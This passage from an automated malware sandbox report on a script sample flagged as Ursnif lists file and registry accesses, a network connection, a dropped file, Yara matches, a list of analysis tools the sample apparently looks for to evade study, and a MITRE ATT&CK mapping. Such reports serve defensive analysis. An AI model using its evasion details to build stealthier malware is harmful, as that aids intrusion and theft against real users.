            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: wscript.exe, 00000000.00000003.711820977.000001C8B6690000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.711801004.000001C8B6389000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWa

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: Oxnard.rb.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 88.99.66.31 187Jump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: autoruns.exe
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation121Path InterceptionProcess Injection11Masquerading11OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion4LSASS MemorySecurity Software Discovery141Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerVirtualization/Sandbox Evasion4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting121NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Information Discovery24VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet